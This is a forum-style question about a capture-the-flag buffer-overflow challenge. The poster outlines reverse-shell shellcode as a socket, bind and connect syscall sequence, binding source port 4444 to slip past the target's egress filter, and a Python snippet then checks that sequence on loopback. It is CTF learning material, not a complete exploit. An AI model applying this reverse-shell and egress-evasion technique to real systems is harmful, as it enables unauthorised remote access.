So, I'm trying to solve a CTF challenge that involves exploiting a remote service. The service doesn't check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flow to my shellcode, the program closes the connection. So, I'm trying to have my shellcode connect back to me. A small hurdle is that the server allows outbound connections only through port 4444. So, my shellcode does the following:

  1. socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  2. bind(socket_fd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16)
  3. connect(socket_fd, {sa_family=AF_INET, sin_port=htons(port_no), sin_addr=inet_addr("ip")}, 16)

I am trying to get a reverse TCP session and I believe by binding to port 4444 the outbound connection will go through 4444. While the exploit works on my local system, the remote exploit does not work. Any thoughts on what I'm missing or what I should be considering? Thanks!
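As an added loopback check (not code from the original post), the socket -> bind -> connect sequence listed above in Python, reporting through getsockname() which local port the kernel actually stamped on the outbound connection; it starts its own listener on 127.0.0.1 and sets SO_REUSEADDR so a repeated run is not refused while the previous client connection still sits in TIME_WAIT.

```python
import socket


def connect_with_source_port(source_port, dst_host, dst_port):
    """socket() -> bind() -> connect(), then return the local port the
    kernel actually used for the outbound connection."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    # Without this, a second run can fail with EADDRINUSE because the
    # previous connection from port 4444 is still in TIME_WAIT.
    client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Binding before connect() fixes the *source* port; the kernel still
    # picks the source address at connect time when 0.0.0.0 is given.
    client.bind(("0.0.0.0", source_port))
    try:
        client.connect((dst_host, dst_port))
        # getsockname() shows the (addr, port) the connection really left from.
        return client.getsockname()[1]
    finally:
        client.close()


def loopback_check(source_port=4444):
    """Stand up a throwaway listener on an ephemeral port, connect to it
    from source_port, and return the observed source port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))      # port 0: let the kernel choose
    listener.listen(1)
    dst_port = listener.getsockname()[1]
    try:
        return connect_with_source_port(source_port, "127.0.0.1", dst_port)
    finally:
        listener.close()


if __name__ == "__main__":
    print("outbound connection left from local port", loopback_check(4444))
```

Running it twice in a row shows the TIME_WAIT point: with the SO_REUSEADDR line removed, the second bind() to 4444 is refused until the earlier connection has aged out.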